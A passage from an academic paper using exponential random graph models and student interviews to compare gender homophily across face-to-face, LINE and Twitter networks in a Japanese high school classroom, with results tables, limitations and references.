messenger, and to whom they comment or reply and on which SNS. In the social network module, I used a name generator based on the ‘recognition method’ (Robins, 2015). Although standard name generators ask for names of individuals who are related to the respondent, in this study, I asked for the roster number of each student in order to not record their names on the questionnaire and protect their personal information. Although the network data to be collected in this study can be directed, the data were converted to undirected networks in the analysis. If at least one of the dyads recognizes the interaction, whether reciprocal or nonreciprocal, I converted it to an undirected tie with weight 1. The research interest of the present study is not in the informational flow or the recognition gap of social ties between males and females, but in the existence of social relationships itself. Moreover, in the section of the questionnaire on social ties in F2F and IM, it asked ‘with whom’ rather than ‘to whom’, which limits the question to ‘interaction’ among students. If the recognition is not reciprocal, it only means that respondents could not recall the interaction. However, the question regarding social ties in SNS, the question asks, ‘to whom they comment or reply’: I asked this question in this way because I believe that questions such as ‘who is the person you comment on AND responds to your comments?’ is redundant and not easy for respondents to recall their social interactions. To evaluate the degree of homophily in each layer, it is necessary to consider other mechanisms of network formation. In particular, this study considers ‘foci’ and ‘triadic closure’ as important network- forming mechanisms. In the following sections, I elaborate on each mechanism in detail. Foci To evaluate the degree of gender homophily more exclusively, it is necessary to consider foci mecha- nisms. ‘Foci’ (or singular ‘focus’) is defined as ‘a social, psychological, legal, or physical entity around which joint activities are organized (e.g., workplaces, voluntary organizations, hangouts, families, etc.)’ (Feld, 1981, p. 1016). Shared foci provide opportunities to form ties within units, independent of preference to some extent (Hallinan and Williams, 1989). I consider foci to be a control variable because, in addition to homophily, it is predicted that students will have more social ties based on belonging to the same club or academic course. If there are gender differences in participation 83 CONNECTIONS in club activities or academic courses and such foci effects were not controlled for, the true homophily effect could not be estimated because of the network autocorrelation caused by the effects of foci. In Japanese high schools, club activities and academic courses are intended as important foci to connect students. Club activity in junior high or high school is called bukatsu in Japanese: bukatsu refers to ‘school club activities and to the clubs themselves, which are devoted not only to sports but also to music, art, science, and others’ (Omi, 2015, p. 256). Students in the same club are predicted to spend most of their school lives together because they practice their activities before and after school, on weekends, and during summer or winter vacations. Therefore, it is natural that club activities operate as strong foci to connect students in the same bukatsu in both the classroom and the online world. In the case of this high school, there are two main types of bukatsu: sports and culture. Sports clubs include tennis, baseball, rugby, swimming, athletics, and kendo. Both girls and boys can join the same club, with some exceptions such as volleyball and basketball club, which are separated by gender (e.g., a girls’ volleyball club and a boys’ volleyball club). Culture clubs include brass bands, choruses, drama, computers, biology, and in-house magazine. Unlike sports clubs, all culture clubs accept participants regardless of gender. Furthermore, academic courses may also operate as foci. In many high schools, students can choose between literature or science courses when they are in the first or second grade. Each academic course has a different curriculum, and students often take classes with students from other classrooms in the same academic course. This study hypothesizes that academic courses also operate as foci because students who share the same academic course spend more time together than those who do not. Triadic closure Network formation is not caused merely by the matching of nodal attributes, but also by network endogenous effects. Sometimes, the network structure itself induces network tie formation. Triadic closure is an important network endogenous mechanism and refers to the trend that friends of friends are more likely to become friends, regardless of shared attributes or foci. In the context of classroom segregation in America, Goodreau et al. (2009) suggest that homophily and friends of friends must be distinguished from one another. To evaluate the degree of gender homophily, the effect of triadic closure should be controlled for; otherwise, the triadic closure mechanism could amplify the homophily effect (Wimmer and Lewis, 2010). Exponential random graph models This study aims to reveal the gender homophily effect of each network layer. As I mentioned before, to estimate the effects of gender homophily, it is necessary to control for other network mechanisms such as foci or triadic closure (Goodreau et al., 2009). Therefore, I used exponential random graph models (ERGMs) (Robins et al., 2007) to do so. Normally, the ERGM is formulated as follows: Pr expY y Z y A =( ) = ( )∑1k qk k The probability of obtaining the observed network can be regressed on various network statistics in an exponential form. Y is a random variable of a binary network, whose network size is the same as the observed network; y is the observed network itself; and θ k is the corresponding parameter of network configuration k. These parameters indicate the extent to which specific network configurations, such as matching of gender or triadic closure, contribute to the whole network formation. z k (y) is a statistic for the network configuration k. For example, if y contains four triangles, z triangle (y) = 4. κ is the normalizing coefficient, or in other words, the sum of exp∑ A θ k z k (y) for all possible networks. A is the set of network configurations. Since κ cannot be calculated realistically even in a small network, parameters are estimated by Monte Carlo maximum likelihood maximization (MC-MLE) based on random graphs generated by MCMC. To evaluate homophily or foci effects, I used a ‘nodematch’ term, which is formulated below. The variable y ij equals 1 if there is an edge between node i and node j; otherwise, y ij equals 0; a i and a j is the attribute of node i,j. This equals the count of edges whose nodal attributes are the same: z ynodematch i j a a ij i j = = ∑ , | To examine the effects of triadic closure, I input network statistics of geometrically weighted edge-wise shared partners (GWESP) as one of the independent variables. The network statistics of the GWESP are formulated as follows: z e e ESP yGWESP y p n p p( ) ( )= − −( )( ) = − −∑a a 1 2 1 1 84 Gender Homophily in Multilayer Media Social Networks where p is the number of shared partners of an edge. The variable n is the number of nodes in the network y. ESP p (y) is a count of edges that have p edge-wise shared partners. If p = 1, ESP 1 (y) equals the number of edges that share only one partner. α is the ‘decay’’ parameter, which is input to avoid the degeneracy problem of the ERGM (Hunter, 2007). Finally, the main research interest of this study is to compare the strength of homophily, that is, the parameter of gender nodematch among various network layers. To evaluate the significance of the differences between network layers, I used 95% confidence intervals (95% CIs) of the estimated para- meters. If 95% CIs of the same parameter between two network layers do not overlap, it can be said that there is a statistically significant difference. Qualitative research Four months after the first questionnaire research, on October 5-7, I conducted semi-structured inter- views based on the results of the aforementioned analysis to capture more information about students’ communication media practices and the mechanisms of social network formation. I asked, for example, ‘do gender or academic courses affect your social connections?’, ‘is there an opportunity to use IM or SNSs in club activities or classes?’, ‘what kind of posts do you mainly make on SNS (Twitter)?’, and ‘how do you make friends on IM and SNSs?’ Ethical considerations To handle the ethical problems of social network research, I complied with the guidelines given by Borgatti and Molina (2005). In the context of the present research, there are two ethical problems to be overcome: anonymity and consent. First, regarding anonymity, few social attributes are sufficient to identify individuals in small organizations (Borgatti and Molina, 2005). Second, regarding consent, non- respondents can be named by other respondents regardless of their will (Borgatti and Molina, 2005). Considering these problems, I performed the following three operations in the research. First, the node IDs assigned to the dataset are not roster numbers but randomly generated numbers. This reduces the risk of personal identification when publishing research datasets. Roster numbers are not perfectly anonymized because these numbers are arranged in the Japanese alphabetical order of students’ last names, and there is a possibility of individual identification. To obtain anonymized node IDs, roster numbers were converted into random numerical sequences that could be mapped onto roster numbers. After completing the research, I deleted the mapping table between the roster numbers and node IDs. Second, in small social groups such as high school classes, individuals can be identified through combinations of social attributes, thus compromising anonymity. To address this, this article provides information on club activity as the number of members or their category (sports or culture) in this article. Third, I created a consent form asking if respondents agreed to participate in the research. All students signed this form, but absent students did not answer this form. In the present study, absent students were eliminated from the study. Results Figure 1 shows network graphs of face-to-face (F2F), IM (LINE), and SNS (Twitter) interactions in both waves. To make it easier to visually compare each layer, nodes in each network are arranged with the same coordinates obtained by the Fruchterman– Reingold algorithm applied to the F2F network of Wave 1 data. Circle-shaped nodes indicate male students and triangle-shaped nodes indicate female students. Table 1 shows the descriptive statistics of the students. In both waves, the number of valid res- ponses was 39 (17 males). The number of club activities to which students in this classroom be- longed was 21, the 3-member clubs totaled 3, the 2-member clubs totaled 12, and the 1-member clubs Figure 1: Network graphs. 85 CONNECTIONS totaled 6. Here, ‘n-member club’ refers to clubs to which n student(s) in this classroom belong. Since almost all students in this high school belonged to some clubs, it is possible that the overall number of members in each club, including students who were not in this class, was much higher than the values displayed here. As for the academic courses, the literature course included 18 students, and the science course included 21 students. For IM, 38 students used LINE, which is the most common instant messenger service in Japan, but one student did not use any IM services. Regarding SNSs, 26 students used SNSs and 13 students did not. Specifically, 23 students had an account on Twitter, 12 students were on Facebook, eight students were on Instagram, eight students used Google+, and three students used other SNSs (multiple answers were allowed). Regarding SNS networks, in the Wave 1 data, three dyads interacted on Instagram, and in the Wave 2 data, it was not possible to determine on which SNS five ties were formed, but the others interacted on Twitter. In order to focus on one SNS mechanism, I excluded those ties from the analysis and examined the social network on Twitter only. In this study, both networks that contained full nodes of the classroom and only nodes that used services were considered. Table 2 shows basic network statistics. The edge counts shown in Table 2 depict the numbers after the aforementioned manipulation. In the parentheses, I reported the statistics of networks that contained only nodes that used the services. Note that isolated nodes in the online social network may actively connect to users outside the classroom. Network density is the value of the observed tie count divided by all possible tie counts given the number of nodes, and it indicates the level of interaction activity within the network. This index was highest in the F2F network compared to IM and SNS networks, and the latter two were relatively similar across both waves. Additionally, the average degree of all nodes, those of only male nodes, and those of only female nodes are shown for both waves. Although in the F2F and SNS network, the average degree of male nodes is greater than that of females, in the IM network, the average degree of female nodes is greater than that of males. This may indicate that female students interact with other students by IM more actively than male students, whereas male students are more active in the F2F and SNS network. Preliminarily, I compare the strength of gender segregation by the E-I index (Krackhardt and Stern, 1988). The E-I index is formulated as (EL − IL)/(EL + IL), where EL is the number of external (inter-gender) links and IL is the number of internal (intra-gender) links. The range of this index is −1.0 (all links are internal) to 1.0 (all links are external). In the Wave 1 data, the index is the lowest (most strongly gender-segregated) in the F2F network, and the second lowest is the IM network. However, in the SNS network, the index is negative, but approximately 0. In the Wave 2 data, the index of the IM network increased to approximately 0 and almost the same level of the SNS network, which means that the proportion of inter-gender ties in the IM network increased in three months. ERGM In Figure 2, the points show the coefficients of gender homophily, and the horizontal bars show 95% Table 1. Descriptive statistics of students. Dimension Attribute Frequency Gender Male 17 Female 22 Club activity 3 members 3 2 members 12 1 member 6 Academic course Literature 18 Science 21 IM (LINE) Registered 38 Not Registered 1 SNS Registered 23 (Twitter) 23 (Facebook) 12 (Google+) 8 (Instagram) 8 (Other) 3 Not Registered 16 Total nodes 39 86 Gender Homophily in Multilayer Media Social Networks confidence intervals of the ERGM on each network layer. In Table 3, all the parameters are shown in table form. See Appendix A for the information on the goodness of fit. The positive effects of gender homophily are depicted in the F2F network across waves. Below, I discuss the main findings of the hypotheses. First, in the SNS network, no gender homophily effect could be observed, and the coefficients are lower than those of the F2F networks. Although the 95% CI of the SNS network with only users in Wave 1 overlapped little with that of the F2F network in the same wave, the estimated coefficient is almost the same as that of the SNS network with all students. This result suggests that, given the same node set, even after controlling for other network formation mechanisms, gender homophily operated more weakly in the SNS network layer than in the F2F network layer, as hypothesized in Hypothesis 1a. Second, whereas in Wave 1 data, the coefficients of gender homophily in the IM networks were positive and statistically significant, in the Wave 2 data, gender homophily in the IM network layer could not be observed at all, as with the SNS network. This result means that Hypothesis 1b is partially supported. On the one hand, the Wave 1 results were not concurrent with the hypothesis but, on the other hand, three months later in the Wave 2 data, gender homophily was reduced to the same degree as that of the SNS network and demonstrated a significant difference from the F2F network, as hypothesized in Hypothesis 1b. Third, although the estimated coefficients of the IM network were more positive than those of the SNS network in the Wave 1 data, the difference was not statistically significant. On the contrary, as previously mentioned, gender homophily effects could not be observed at all in the Wave 2 data, as in the SNS network layer. This result indicates that Hypothesis 2 is not supported. However, it is remarkable that at first, IM had a weak positive effect of homophily that disappeared within three months. Additionally, the foci effects of club activities were high in every layer, and this mechanism was robust among various network layers. This suggests that we cannot ignore real-world social institutions when considering the mechanisms for not only offline networks but also online networks. At the same time, the data showed no effect of academic courses on any network layer except F2F. This means that students were not connected to each other online Table 2. Network statistics. Index F2F IM SNS (Wave 1) Node count 39 39 (38) 39 (23) Edge count 183 32 (32) 34 (33) Density 0.247 0.043 (0.046) 0.046 (0.13) Average degree (All) 18.769 3.282 (3.368) 3.487 (5.739) Average degree (Male) 20.091 3 (3) 4.182 (6.429) Average degree (Female) 17.059 3.647 (3.875) 2.588 (4.667) E-I Index −0.486 −0.438 (−0.438) −0.059 (−0.091) (Wave 2) Node count 39 39 (38) 39 (23) Edge count 188 33 (33) 20 (20) Density 0.254 0.045 (0.047) 0.027 (0.079) Average degree (All) 19.282 3.385 (3.474) 2.051 (3.478) Average degree (Male) 22.091 3.091 (3.091) 2.364 (3.714) Average degree (Female) 15.647 3.765 (4) 1.647 (3.111) E-I Index −0.479 −0.03 (−0.03) 0 (0) 87 CONNECTIONS Figure 2: Estimated coefficients of gender homophily by ERGM (Horizontal bars are 95% CIs). simply because they were in the same classes. These results were robust across waves. The triadic closure effect was observed on every network layer and waves. This means that all the networks tended toward triadic closure, even after controlling for nodal attributes such as gender. In other words, in these network layers, friends of friends were likely to be connected to each other. It is worth noting that in the Wave 1 data, although the difference was not statistically significant, the SNS (and SNS without non-users) network was the most transitive network among all layers. However, this tendency for triad closure in the SNS was weaker in Wave 2. In Appendix B, I discuss the difference in the strength of gender homophily separately for each gender. Semi-structured interviews Table 4 summarizes the attributes of the interviewees from the semi-structured interviews. When selecting subjects, I chose not to bias the gender, academic course, affiliation to club activities, or media usage of the interviewees who were able to schedule interviews during the limited time period available for interviews. At the time of the interviews, in order to avoid students’ attrition, their narratives were not recorded electronically; I simply wrote them in field notes during the interviews. Interviewees’ narratives in this article were reconstructed from field notes, and names were alphabetized from A to G (see Table 4) to identify who said what in the quotes in the following discussion. 88 Gender Homophily in Multilayer Media Social Networks Table 3. All estimated coefficients of ERGMs. F2F IM IM(USERS ONLY) SNS SNS(USERS ONLY) Wave 1 Edges −3.711*** −4.093*** −4.009*** −4.898*** −3.496*** (0.211) (0.393) (0.390) (0.418) (0.494) Homophily (gender) 0.935*** 0.823* 0.786* 0.066 0.053 (0.138) (0.391) (0.394) (0.253) (0.385) Foci (academic course) 0.359* 0.030 0.043 −0.271 −0.266 (0.161) (0.379) (0.376) (0.294) (0.438) Foci (club activity) 2.902*** 2.702*** 2.690*** 2.285*** 3.187*** (0.612) (0.485) (0.496) (0.474) (0.849) GWESP 0.393*** 0.591* 0.537* 2.059*** 1.259*** (0.043) (0.262) (0.249) (0.289) (0.315) AIC 682.547 238.872 236.380 217.169 166.698 BIC 705.587 261.912 259.157 240.209 184.365 Log Likelihood −336.273 −114.436 −113.190 −103.584 −78.349 Wave 2 Edges −3.958*** −3.886*** −3.826*** −4.516*** −3.297*** (0.207) (0.353) (0.359) (0.420) (0.455) Homophily (gender) 0.918*** −0.078 −0.105 −0.098 −0.234 (0.124) (0.362) (0.364) (0.379) (0.444) Foci (academic course) 0.345* 0.460 0.461 0.299 0.465 (0.154) (0.352) (0.347) (0.340) (0.403) Foci (club activity) 3.044*** 2.210*** 2.221*** 1.787** 2.040** (0.596) (0.501) (0.509) (0.587) (0.744) GWESP 0.455*** 0.861*** 0.813*** 1.520*** 0.823** (0.038) (0.247) (0.231) (0.287) (0.284) AIC 664.692 252.816 249.218 170.071 136.207 BIC 687.732 275.856 271.995 193.111 153.873 Log Likelihood −327.346 −121.408 −119.609 −80.036 −63.103 Notes: Decay parameter of GWESP (alpha) is set to 1.5 (F2F), 0.1 (IM), 0.3 (SNS). *p < 0.05; **p < 0.01; ***p < 0.001. Practices on IM (LINE) Regarding interaction on IM, belonging to the same club was recognized as one of the most important factors in forming a relationship. Student D reported: ‘I use LINE with people who belong to the same club activity.’ Students reported that IM was mainly used as a tool for conveying information about club activities, as student D added: ‘I mainly use it for business communication, not chatting. I often use IM for club activities, but I am not an active user in this classroom.’ As another example, student C said: ‘In one-on-one communication, I just talk with people in the same group activity to discuss topics that are inconvenient to talk about in reality, such as deciding on a birthday gift for the teacher.’ One-on-one IM 89 CONNECTIONS communication with classmates was also used for communication regarding classroom affairs. Moreover, ‘arrangement of seats’ or a ‘common hobby’, such as playing videogames, were key factors in cultivating relationships between students, which was not considered in the quantitative study. Regarding the ‘arrangement of seats,’ student D said: ‘I don’t have many personal talks, but if any, I send a picture of the class board. I do not talk much, but I often talk to people in the same class who are seated close to me.’ Regarding the importance of a common hobby, student F said, ‘When it comes to one-on- one communication, I often talk about videogames with people in my class on LINE.’ This indicates that ‘hobby homophily’ also operates in the IM network. However, how do students begin interacting with IM? When it comes to friending, students are reluctant to register other students as friends without experiencing the F2F interaction. For example, student D said, ‘I am not the type who adds friends myself. People I have not met in real life do not become my friends. I only accept a request if it is sent from another person’. She added, ‘Not many people interact with me through LINE alone; I do not register people as friends if I have never spoken to them’ There is a process through which F2F communication takes place first, followed by friend registration, and then message exchanges on IM. This may be the reason the homophily mechanisms of the F2F network and the IM network in its early stage are relatively consistent compared to the SNS network. Practices on SNSs (Twitter) The results of the semi-structured interview suggested that in the SNS network, as well as the IM network, ‘hobby’ was the main topic of conversations, and if students had a common hobby, they were still likely to follow each other even if they did not talk in reality. For example, student A said: ‘Some people talk about their hobbies on LINE with the same high school people they met on Twitter. Sometimes they meet on Twitter and then talk on LINE.’ As another example, student F reported: ‘I often talk about my hobbies with people on Twitter. If it is not a protected account, and if I think my hobbies are going to match, I think a person is safe and even people who do not know me may follow me. Some people have conversations about hobbies on Twitter and then actually get along in real life.’ After discussing their hobbies on Twitter, students began talking on IM or in real life, thus deepening their friendships. Unlike IM, students do not necessarily follow users on SNSs after meeting them in the real world. Thus far, it has been revealed that, following SNS networks did not necessarily require offline communication, the exchange of contacts through IM often originated in face-to-face communication. Therefore, it can be inferred that network formation mechanisms in the IM network are more consistent with the F2F network than the SNS network in its early stage. The ERGM results of the IM network in Wave 1 showed weak gender homophily effects, but no effects were shown in Wave 2. This means that in Wave 1, which was conducted about two months after the students were assigned to a new class, the IM network was more consistent with the F2F network than in Wave 2. The effects of gender homophily vanished in Wave 2. Therefore, it can be assumed that social interactions in the IM network became independent from the earlier F2F network in three months. Table 4. Information of sampled participants. Name Gender Academic course Club activity Register IM (LINE)? Register SNS (Twitter)? A Female Science Culture Yes Yes B Male Literature Culture Yes No C Male Science Culture Yes No D Female Literature Sports Yes Yes E Male Science Sports Yes No F Male Science Culture Yes Yes G Male Science Sports Yes Yes 90 Gender Homophily in Multilayer Media Social Networks Furthermore, regarding SNSs, it was suggested that functions such as the ‘retweet’ or ‘recommended users’ induce relationships between students in the classroom. Student A said: ‘Although we have never actually spoken, sometimes a friend retweets another friend’s tweet and I follow, knowing that the person is in the same class as me’. Student G also said: ‘users who belong to the same class are usually shown as ‘recommended users’ on Twitter. I do not necessarily follow after getting acquainted with them in reality.’ If students cannot identify whom an account be- longs to in a class, they ask someone they know. Student D said: ‘I sometimes ask my friends who a certain account belongs to. The recommendation function can tell you that you are in the same class.’ As previously explained, on SNSs, ‘belonging to the same classroom’ becomes a similar group identity, and social ties may emerge regardless of gender, assisted by the functions built into the platform. In the previous section, the ERGM result showed that the effect of triad closure on Twitter was higher than that on other network layers, which was likely caused by such technical factors. Discussion and conclusion Thus far, I have compared the strength of gender homophily among various media network layers. First, Hypothesis 1a: in the SNS social network layer, gender homophily operates more weakly than in the offline social network layer was supported. Even when other networking mechanisms were controlled, the ERGM showed no gender homophily mechanism in SNSs. However, there was a clear difference in the strength of homophily between F2F and SNS networks. Whereas the gender homophily mechanism operated strongly in the F2F network, no such effect could be observed in the SNS network. This difference was statistically significant, given the same node set as the F2F network. Hypothesis 1b: In the IM social network layer, gender homophily operates more weakly than in the offline social network layer was only partially supported. Whereas the coefficients of gender homophily in the IM networks were positive and statistically significant in the Wave 1 data, no gender homophily was observed at all in the IM network layer in the Wave 2 data, as in the SNS network. The qualitative research indicated that this was caused by the differences in the process of friending between IM and SNSs. Whereas F2F contact did not necessarily precede friending in the SNS networks, the exchange of contacts in IM often originated in F2F communication. This can be interpreted as follows: since network formation in the IM network layer required F2F contact, the IM network was consistent with the F2F network in the early stages. However, communication in IM became independent from F2F and the gender homophily effects also disappeared in three months. Third, Hypothesis 2: In the SNS social network layers, gender homophily operates more weakly than in the IM social network layers was not supported. However, it was remarkable that, at first, IM had a weak homophily effect and vanished within three months. These results show that, regarding multiplex- media networks, social networks on online media are more likely to be heterophilic than those in the offline space, even though IM had a weak but positive gender homophily effect at first. From the qualitative research, some practices or social contexts of communication media were specified that could explain the results of the quantitative analysis. Table 5 depicts the diffe- rence between IM and SNSs in terms of gender homophily and its formation process. Triggered Table 5. Summarization of the gender homophily effects of IM and SNS networks and their formation principles. Media Gender homophily Formation principles IM Weak positive (Wave 1) F2F communication preceded friending None (Wave 2) Hobby homophily SNS None (Wave 1) F2F communication did not necessarily precede following None (Wave 2) ‘Retweet’ or ‘recommended users’ induced social ties Hobby homophily 91 CONNECTIONS by the characteristic functions on Twitter such as ‘retweeting’ or ‘recommended users,’ once students identified a user as being ‘in the same classroom’ or having a ‘common hobby,’ they connected with each other. The relative weakness of gender homophily in the online networks could be explained by not only the foci mechanism of ‘classroom membership’ but also ‘hobby homophily.’ These factors canceled out the gender homophily effects. These findings can also be explained in terms of ‘multidimensional homophily’ (Block and Grund, 2014). According to Block and Grund (2014), homophily effects can be strongly observed; however, the interaction para- meter of sex and some other dimensions is less likely to occur. Simply put, homophily is likely to occur in one dimension but not in two or more dimensions. From this perspective, the result implies that multidimensional matching of both cultural tastes and gender is less likely to occur. Overall, this study implies that considering offline or online space alone may cause misunderstanding regarding homophily because the observed stre- ngth of homophily effects depends on whether the space is examined offline or online. In addition, how heterogeneous the online connections depend on what kind of online media is investigated and when social network data are collected, as it is indicated that IM is gender homophilous in the early stage of the classroom, but becomes less homophilous three months later. This suggests that studies about homophily in an organization based on online connection data have to be careful of the characteristics and practical usages of online media. Or, more discussion about what is the ‘actual’ homophily needed; is it an online network, an offline network, or a network merging these networks together? Regarding Hypothesis 1a, no gender homophily effect was observed in either wave in the SNS network, although the difference with the IM network was not significant. This may indicate that, in the SNS network, the group identity of being part of the ‘same classroom’ played a key role in network formation. F2F communication did not necessarily precede friending in the SNS. Students encounter one another online through ‘recommended users’ or ‘retweeting’ in a platform that contains many strangers who are not members of their class. This feature of SNSs may enhance the situated group identity of being ‘classmates’ for students, which can lead a connection on the SNS to be more gender heterogeneous even though the students might have never spoken in the offline classroom. However, this result indicates that network formation on SNSs at least partially depends on the recommendation algorithms. Therefore, the relative weakness of gender homophily on SNSs could be lost if there is a change in the architecture of the services. Online social networks are important because they generate ‘latent ties’ (Haythornthwaite, 2005), in which otherwise disconnected people are connected through electronic communication media. Although it is impossible to predict whether these connections will become a ‘real’ social network, these latent ties connect dissimilar people. Future research must trace social ties online and examine whether they emerge offline. Limitations There are some limitations to the present study. First, since this study was a case study of a single high school classroom, connections that occurred outside of the class (e.g., within the whole school) could not be considered. In the future, it will be necessary to verify the hypothesis in a group that includes more social actors. Second, in this study, only gender homophily was considered. However, it is necessary to examine how the strength of homophily offline and online differs in other social dimensions, such as age and political attitude. Third, this study did not track real interactions in the online world. Students were merely asked about their interactions via a questionnaire. Many students’ accounts on Twitter were set to private. As a result, it was difficult to obtain matches between offline and online identities and agreements with respondents. Students answered each question based on their memory and estimation of their behavior across these media. I did not observe how students actually replied to or commented on online posts or communicated F2F. Therefore, they may have provided inaccurate responses regarding the individuals with whom they connected in different settings. Moreover, respondents may have felt shy and underreported their F2F cross-gender relation ships if there was a norm that constrained cross-gender interactions in their classroom. Fourth, the dataset used in this research lacked specification regarding the strength or type of social ties. This raises the question: are those ties strong or weak, and are they friendships or romantic rela- tionships? The latter difference is a unique point in gender homophily. In a survey of Japanese high school students, 49.4% of male students and 62.6% of female students reported that they had dated before (Takehara et al., 2006). Therefore, 92 Gender Homophily in Multilayer Media Social Networks cross-gender ties in this study could have included romantic partnerships. Information on the nature of social ties would help reveal what types of norms are alleviated by online space. For instance, if these ties were friendships, it could be supposed that there is a norm that constrains cross-gender friendships in the classroom. Future research should address this issue. Finally, this study only targeted second-grade high school students. It is known that the effects of homophily change with age (Shrum et al., 1988; Laniado et al., 2016), and the difference between offline and online homophily can decrease or disappear. Future studies should consider broadening the age range. Acknowledgments This research received a grant from GUSHINKAI FOUNDATION, 2016-2017 (Representative: Naoki Maejima). References Barlow, J. P. 1996. Declaration of independence for cyberspace, available at: https://www.eff.org/cyberspace- independence. Baym, N. K. and Ledbetter, A. 2009. Tunes that bind? Predicting friendship strength in a music-based social network. Information, Communication & Society 12: 408–427. Block, P. and Grund, T. 2014. Multidimensional homophily in friendship networks. Network Science 2: 189–212. Booth, A. and Hess, E. 1974. Cross-sex friendship. Journal of Marriage and the Family 36: 38–47. Borgatti, S. P. and Molina, J. 2005. Toward ethical guidelines for network research in organizations. Social Networks 27: 107–117. Boyd, D. M. 2008. Taken Out of Context: American Teen Sociality in Networked Publics. PhD Dissertation, University of California, Berkeley, CA. Boyd, D. M. and Ellison, N. B. 2007. Social network sites: definition, history, and scholarship. Journal of Computer-mediated Communication 13: 210–230. Colleoni, E., Rozza, A. and Arvidsson, A. 2014. Echo chamber or public sphere? Predicting political orientation and measuring political homophily in twitter using big data. Journal of Communication 64: 317–332. Conover, M. D., Ratkiewicz, J., Francisco, M., Gonçalves, B., Menczer, F. and Flammini, A. 2011. “Political polarization on Twitter”, Proceedings of the Fifth International AAAI Conference on Weblogs and Social Media, Barcelona. Domínguez, S. and Hollstein, B. 2014. Mixed Methods Social Networks Research: Design and Applications. Cambridge University Press, New York, NY. Ellison, N. B., Steinfield, C. and Lampe, C. 2007. The benefits of Facebook “friends”: social capital and college students’ use of online social network sites. Journal of Computer-mediated Communication 12: 1143–1168. Feld, S. 1981. The focused organization of social ties. American Journal of Sociology 86: 1015–1035. Feld, S. and Grofman, B. 2009. “Homophily and the focused organization of ties”, In Hedstrom, P. and Bearman, P. (Eds), The Oxford Handbook of Analytical Sociology. Oxford University Press, New York, NY, 521–543. Goodreau, S. M., Kitts, J. A. and Morris, M. 2009. Birds of a feather, or friend of a friend? Using exponential random graph models to investigate adolescent social networks. Demography 46: 103–125. Hallinan, M. T. and Williams, R. A. 1989. Interracial friendship choices in secondary schools. American Sociological Review 54: 67–78. Haythornthwaite, C. 2001. Exploring multiplexity: social network structures in a computer-supported distance learning class. The Information Society 17: 211–226. Haythornthwaite, C. 2005. Social networks and Internet connectivity effects. Information, Community & Society 8: 125–147. Hristova, D., Musolesi, M. and Mascolo, C. 2014. “Keep your friends close and your Facebook friends closer: A multiplex network approach to the analysis of offline and online social ties”, Proceedings of the Eighth International AAAI Conference on Weblogs and Social Media, Ann Arbor, MI. Hunter, D. R. 2007. Curved exponential family models for social networks. Social Networks 29: 216–230. Igarashi, T. 2013. “Longitudinal changes in face-to- face and text message-mediated friendship networks”, In Lusher, D., Koskinen, J. and Robins, G. (Eds), Exponential Random Graph Models for Social Networks: Theory, Methods and Applications. Cambridge University Press, New York, NY, 248–259. Igarashi, T., Takai, J. and Yoshida, T. 2005. Gender differences in social network development via mobile phone text messages: a longitudinal study. Journal of Social and Personal Relationships 22: 691–713. Kalmijn, M. 2002. Sex segregation of friendship networks. Individual and structural determinants of having cross-sex friends. European Sociological Review 18: 101–117. Kandel, D. B. 1978. Homophily, selection, and socialization in adolescent friendships. American Journal of Sociology 84: 427–436. Kendall, L. 2002. Hanging out in the Virtual Pub: Masculinities and Relationships Online. University of California Press, Berkeley. 93 CONNECTIONS Kiesler, S., Siegel, J. and McGuire, T. 1984. Social psychological aspects of computer-mediated communication. American Psychologist 39: 1123–1134. Kivelä, M., Arenas, A., Barthelemy, M., Gleeson, J. P., Moreno, Y. and Porter, M. A. 2014. Multilayer networks. Journal of Complex Networks 2: 203–271. Krackhardt, D. and Stern, R. N. 1988. Informal networks and organizational crises: An experimental simulation. Social Psychology Quarterly 51: 123–140. Laniado, D., Volkovich, Y., Kappler, K. and Kaltenbrunner, A. 2016. “Gender homophily in online dyadic and triadic relationships”, EPJ Data Science, 5. Leszczensky, L. and Pink, S. 2015. Ethnic segregation of friendship networks in school: testing a rational-choice argument of differences in ethnic homophily between classroom-and grade-level networks. Social Networks 42: 18–26. McPherson, M., Smith-Lovin, L. and Cook, J. M. 2001. Birds of a feather: homophily in social networks. Annual Review of Sociology 27: 415–444. Mehta, C. M. and Strough, J. 2009. Sex segregation in friendships and normative contexts across the life span. Developmental Review 29: 201–220. Meyrowitz, J. 1986. No Sense of Place: The Impact of Electronic Media on Social Behavior. Oxford University Press, New York, NY. Moody, J. 2001. Race, school integration, and friendship segregation in America. American Journal of Sociology 107: 679–716. Mouw, T. and Entwisle, B. 2006. Residential segregation and interracial friendship in schools. American Journal of Sociology 112: 394–441. Omi, Y. 2015. “The potential of the globalization of education in Japan: the Japanese Style of School Sports Activities (Bukatsu)”, In Marsico, G., Dazzani, V., Ristum, M. and de Sousa Bastos, A. C. (Eds), Educational Contexts and Borders through a Cultural Lens: Looking Inside, Viewing Outside, Springer, New York, NY, 255–266. Parks, M. R. and Floyd, K. 1996. Making friends in cyberspace. Journal of Communication 46: 80–97. Parks, M. R. and Roberts, L. D. 1998. Making MOOsic’: the development of personal relationships on-line and a comparison to their off-line counterparts. Journal of Social and Personal Relationships 15: 517– 537. Rheingold, H. 1993. The Virtual Community: Finding Connection in a Computerized World. Addison-Wesley Longman Publishing, Boston, MA. Robins, G. 2015. Doing Social Network Research: Network-based Research Design for Social Scientists. Sage, London. Robins, G., Pattison, P., Kalish, Y. and Lusher, D. 2007. An introduction to exponential random graph (p*) models for social networks. Social Networks 29: 173–191. Shrum, W., Cheek, N. H. and Hunter, S. M. 1988. Friendship in school: gender and racial homophily. Sociology of Education 61: 227–239. Sproull, L. and Kiesler, S. 1986. Reducing social context cues: Electronic mail in organizational communication. Management Science 32: 1492–1512. Stehlé, J., Charbonnier, F., Picard, T., Cattuto, C. and Barrat, A. 2013. Gender homophily from spatial behavior in a primary school: a sociometric study. Social Networks 35: 604–613. Takehara, K., Misago, C. and Honda, Y. 2006. Sexual behavior and sex education needs among high school students. Japanese Journal of Health and Human Ecology 72: 215–224. Teddlie, C. and Tashakkori, A. 2006. A general typology of research designs featuring mixed methods. Research in the Schools 13: 12–28. Thelwall, M. 2009. Homophily in myspace. Journal of the American Society for Information Science and Technology 60: 219–231. Walther, J. B. 1992. Interpersonal effects in computer-mediated interaction: a relational pers- pective. Communication Research 19: 52–90. Walther, J. B. 1996. Computer-mediated commu- nication: impersonal, interpersonal, and hyperpersonal interaction. Communication Research 23: 3–43. Wimmer, A. and Lewis, K. 2010. Beyond and below racial homophily: ERG models of a friendship network documented on Facebook. American Journal of Sociology 116: 583–642. Appendix A To evaluate the goodness of fit of the ERGMs, I randomly generated 100 networks from the estimated models and examined whether the model could replicate the observed network features. In Figures A1 (Wave 1) and A2 